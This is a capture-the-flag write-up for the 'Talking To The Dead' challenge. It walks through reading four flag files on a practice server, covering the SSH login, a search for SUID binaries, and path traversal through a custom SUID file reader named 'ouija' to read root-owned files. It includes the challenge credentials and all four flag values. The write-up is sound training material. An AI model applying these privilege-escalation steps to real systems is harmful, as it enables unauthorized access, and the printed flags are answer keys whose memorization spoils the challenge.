Talking To The Dead
Flags 1, 2, 3 and 4
Author: syyntax
We've obtained access to a server maintained by spookyboi. There are four flag files that we need you to read and submit (flag1.txt, flag2.txt, etc). Submit the contents of flag1.txt.
ssh hacktober@env.hacktober.io
Password: hacktober-Underdog-Truth-Glimpse
Flags 1 and 2:
SSHing in and running the command whoami
we see we're logged in as luciafer
.
Navigating to /home/luciafer/Documents
, I ran ls -alt
and the output was as follows:
luciafer@40504779afeb:~/Documents$ ls -alt
total 20
drwxrwxr-x 1 luciafer luciafer 4096 Oct 6 08:36 .
-rw-rw-r-- 1 luciafer luciafer 47 Oct 6 08:36 .flag2.txt
-rw-rw-r-- 1 luciafer luciafer 47 Oct 5 14:55 flag1.txt
drwxr-xr-x 1 luciafer luciafer 4096 Oct 5 14:54 ..
Since luciafer
owns both these files, I can simply run cat flag1.txt
and cat .flag2.txt
to get the flags.
flag 1: flag{cb07e9d6086d50ee11c0d968f1e5c4bf1c89418c}
flag 2: flag{728ec98bfaa302b2dfc2f716d3de7869f3eadcbf}
Flags 3 and 4:
After looking around, I found flag3.txt located at /home/spookyboi/Documents/flag3.txt
and flag4.txt at /root/flag4.txt
. Since luciafer doesn't have sufficient perms to read these files, I ran the command
find / -perm -u=s -type f 2>/dev/null
to find SUID files.
SUID is a special file permission for executable files, which enables other users to run the file with effective permissions of the file owner. This means we could privilege escalate to root or a higher privileged user, giving us perms to read the flag files.
This was the output:
luciafer@40504779afeb:/root$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/umount
/usr/bin/passwd
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/chfn
/usr/local/bin/ouija
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
The program ouija
jumped out to me, so i tried running it:
luciafer@40504779afeb:/root$ /usr/local/bin/ouija
OUIJA 6.66 - Read files in the /root directory
Usage: ouija [FILENAME]
EXAMPLES:
ouija file.txt
ouija read.meluciafer@40504779afeb:/root$
Excellent! it reads files in the /root
directory, meaning we simply go
luciafer@40504779afeb:/root$ /usr/local/bin/ouija flag4.txt
flag{4781cbffd13df6622565d45e790b4aac2a4054dc}
We use the same program to get the flag from flag3.txt as so:
luciafer@40504779afeb:/root$ /usr/local/bin/ouija ../home/spookyboi/Documents/flag3.txt
flag{445b987b5b80e445c3147314dbfa71acd79c2b67}
Note: as we start in the /root
directory, so must go back one (../
) to navigate to flag3.txt.
By das
Last updated
Was this helpful?